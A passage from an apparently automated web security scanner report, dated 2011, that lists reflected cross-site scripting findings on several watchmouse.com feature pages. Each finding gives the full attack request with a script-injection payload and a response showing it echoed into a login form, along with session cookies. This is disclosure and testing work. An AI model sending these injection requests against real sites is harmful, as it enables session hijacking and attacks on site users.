Date: Wed, 09 Feb 2011 12:07:13 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-b01d643f5039e3a66b7066b82384252f"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13118

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/feature/privacy.phpf3859"><script>alert(1)</script>e5e0918e440" method="post">
...[SNIP]...

1.130. http://www.watchmouse.com/en/feature/privacy.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/feature/privacy.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46246"><script>alert(1)</script>9bf03c9f7d5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/feature/privacy.php?46246"><script>alert(1)</script>9bf03c9f7d5=1 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:01 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-68dc770236128d3194a2ffe513a1baec"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13145

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/feature/privacy.php?46246"><script>alert(1)</script>9bf03c9f7d5=1" method="post">
...[SNIP]...

1.131. http://www.watchmouse.com/en/feature/public-status-page.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/feature/public-status-page.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9bdc9"><script>alert(1)</script>bb88294aa54 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /en9bdc9"><script>alert(1)</script>bb88294aa54/feature/public-status-page.html HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/plans_price.php
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.2.10.1297252772

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 11:59:42 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-be05360e576c233d56e25e29eec1693e"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13253

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/en9bdc9"><script>alert(1)</script>bb88294aa54/feature/public-status-page.html" method="post">
...[SNIP]...

1.132. http://www.watchmouse.com/en/feature/public-status-page.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/feature/public-status-page.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 462b5"><script>alert(1)</script>6234e43e26f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/feature462b5"><script>alert(1)</script>6234e43e26f/public-status-page.html HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/plans_price.php
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.2.10.1297252772

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 11:59:43 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-95e850ad6c2bc26b34d2b51bc5767404"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13226

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/feature462b5"><script>alert(1)</script>6234e43e26f/public-status-page.html" method="post">
...[SNIP]...

1.133. http://www.watchmouse.com/en/feature/public-status-page.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/feature/public-status-page.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12dec"><script>alert(1)</script>27f8bccc38a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/feature/public-status-page.html12dec"><script>alert(1)</script>27f8bccc38a HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/plans_price.php
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.2.10.1297252772

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 11:59:43 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-ae61fdac524b373afec63550de3c5690"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13226

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/feature/public-status-page.html12dec"><script>alert(1)</script>27f8bccc38a" method="post">
...[SNIP]...

1.134. http://www.watchmouse.com/en/feature/public-status-page.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/feature/public-status-page.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2f6d9"><script>alert(1)</script>388432ad43 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/feature/public-status-page.html?2f6d9"><script>alert(1)</script>388432ad43=1 HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/plans_price.php
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.2.10.1297252772

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 11:59:40 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-2735e7a1ef50ee8e28249f2cdc9f9897"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 24217

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="/en/feature/public-status-page.html?2f6d9"><script>alert(1)</script>388432ad43=1" method="post">
...[SNIP]...

1.135. http://www.watchmouse.com/en/feature/real-browser-monitoring.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/feature/real-browser-monitoring.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 73d64"><script>alert(1)</script>aab42013a99 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /en73d64"><script>alert(1)</script>aab42013a99/feature/real-browser-monitoring.html HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:06:49 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-63c0fa6f00e5b24070d01047c5576e0f"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13298

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/en73d64"><script>alert(1)</script>aab42013a99/feature/real-browser-monitoring.html" method="post">
...[SNIP]...

1.136. http://www.watchmouse.com/en/feature/real-browser-monitoring.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/feature/real-browser-monitoring.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47808"><script>alert(1)</script>ab026478454 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/feature47808"><script>alert(1)</script>ab026478454/real-browser-monitoring.html HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:06:51 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-4bfd110f0a2ac986236468e82196b9c5"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13271

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/feature47808"><script>alert(1)</script>ab026478454/real-browser-monitoring.html" method="post">
...[SNIP]...

1.137. http://www.watchmouse.com/en/feature/real-browser-monitoring.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/feature/real-browser-monitoring.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9c88"><script>alert(1)</script>bf91e9ef796 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/feature/real-browser-monitoring.htmlc9c88"><script>alert(1)</script>bf91e9ef796 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:06:52 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-146a13ae94863efabb3f624bc4e355e3"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13271

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/feature/real-browser-monitoring.htmlc9c88"><script>alert(1)</script>bf91e9ef796" method="post">
...[SNIP]...

1.138. http://www.watchmouse.com/en/feature/real-browser-monitoring.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/feature/real-browser-monitoring.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13e57"><script>alert(1)</script>34452ce25c2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/feature/real-browser-monitoring.html?13e57"><script>alert(1)</script>34452ce25c2=1 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:06:48 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-43dc1af83e01620d9f93f13a556e0ca2"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24330

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="/en/feature/real-browser-monitoring.html?13e57"><script>alert(1)</script>34452ce25c2=1" method="post">
...[SNIP]...

1.139. http://www.watchmouse.com/en/feature/root-cause-analysis.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/feature/root-cause-analysis.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f719a"><script>alert(1)</script>fe6f494f651 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /enf719a"><script>alert(1)</script>fe6f494f651/feature/root-cause-analysis.html HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:06:57 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-f496e405fc56526c5e898d5baf8ad709"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13262

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/enf719a"><script>alert(1)</script>fe6f494f651/feature/root-cause-analysis.html" method="post">
...[SNIP]...

1.140. http://www.watchmouse.com/en/feature/root-cause-analysis.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/feature/root-cause-analysis.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72b68"><script>alert(1)</script>a0ac75a4b1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/feature72b68"><script>alert(1)</script>a0ac75a4b1/root-cause-analysis.html HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:06:59 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-6b914dec999cb4301f33870ab5884863"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13226

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/feature72b68"><script>alert(1)</script>a0ac75a4b1/root-cause-analysis.html" method="post">
...[SNIP]...

1.141. http://www.watchmouse.com/en/feature/root-cause-analysis.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/feature/root-cause-analysis.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36ff7"><script>alert(1)</script>5fd6e5ae297 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/feature/root-cause-analysis.html36ff7"><script>alert(1)</script>5fd6e5ae297 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:00 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-f27f15bb55bf33b2a5ec51a076eb4666"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13235

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/feature/root-cause-analysis.html36ff7"><script>alert(1)</script>5fd6e5ae297" method="post">
...[SNIP]...

1.142. http://www.watchmouse.com/en/feature/root-cause-analysis.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/feature/root-cause-analysis.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a0776"><script>alert(1)</script>e915fb25c57 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/feature/root-cause-analysis.html?a0776"><script>alert(1)</script>e915fb25c57=1 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:06:56 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-3721a1ca645acf9e8df3b25ee40bb4c6"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22191

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
